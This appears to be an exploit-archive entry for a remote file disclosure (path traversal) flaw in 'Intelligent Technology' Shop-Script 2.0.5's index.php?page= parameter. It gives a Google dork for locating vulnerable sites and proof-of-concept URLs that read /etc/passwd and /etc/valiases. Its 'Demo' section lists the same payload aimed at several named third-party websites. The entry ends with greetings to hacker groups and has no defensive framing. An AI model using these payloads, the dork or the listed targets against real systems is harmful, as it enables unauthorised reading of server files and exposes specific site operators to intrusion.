Intelligent Technology Shop-Script 2.0.5 Remote File Disclosure



EKU-ID: 1160 CVE: OSVDB-ID:
Author: d3v1l r00t3r Published: 2011-10-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: ["Intelligent Technology" Shop-Script 2.0.5 index.php?page= Remote File Disclosure]
# Google Dork: intext: Разработка сайта © Компания "Разумные технологии"
# Vendor site: http://razumteh.com/
# Date: [17/10/2010]
# Author: [d3v1l r00t3r]
# Version: [3.05]
# Tested on: [Windows Xp, Windows Server, Linux, Ubuntu ]

################################################################################################################
"Intelligent Technology" Shop-Script 2.0.5 index.php?page= Remote File Disclosure
################################################################################################################
Author : d3v1l r00t3r

Dork : intext: Разработка сайта © Компания "Разумные технологии"
################################################################################################################
Proof Of Concept :
http://localhost/[path]/index.php?page=../../../../etc/passwd
http://localhost/[path]/index.php?page=../../../../etc/valiases/{Reverse Website}
################################################################################################################
Demo:
http://офисная-мебель.com.ua/index.php?page=../../../../etc/passwd

http://supernova.kiev.ua/index.php?page=../../../../etc/valiases/supernova.kiev.ua

http://nikamebel.com/index.php?page=../../../../etc/passwd

################################################################################################################
Gr33ts t0: T3es, S@XXOR, Prosperous, Shadow008, J|nx, HexCoder, dreams.hacker,Stupid, ..:arsh:.., Anthrax,
MindCracker,Niyola270, 0ludonh4ck3r  & v1p3r
################################################################################################################   
We Ar3 ABH Hack3r6- (Trust And Safety)

Am not a Russian hack3r, but i see some vuln in Russia...1 L0v3